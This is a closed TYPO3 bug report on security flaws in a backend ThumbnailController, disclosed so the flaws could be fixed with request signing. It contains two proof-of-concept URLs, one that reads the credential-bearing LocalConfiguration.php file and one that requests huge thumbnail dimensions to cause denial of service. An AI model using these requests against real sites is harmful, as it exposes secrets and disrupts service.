Project

General

Profile

Actions
Copy link

Bug #85875

closed

Issues in ThumbnailController

Added by Oliver Hader over 5 years ago. Updated over 5 years ago.

Status:
Closed
Priority:
Must have
Assignee:
-
Category:
Backend API
Target version:
8.7.19
Start date:
2018-08-16
Due date:
% Done:

100%

Estimated time:
TYPO3 Version:
8
PHP Version:
7.2
Tags:
Complexity:
Is Regression:
Sprint Focus:

Description

  • information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)
  • denial of service (dimensions, basically whole configuration can be arbitrary)

Introduced in https://review.typo3.org/#/c/56765/ - not released yet to 9.4.0 nor 8.7.19

Solution: Add HMAC to all HTTP request parameters.

PoC

XSRF Token has to be adjusted in the links below

Information Disclosure

http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=

Denial of Service

http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
Actions
Copy link

Also available in: Atom PDF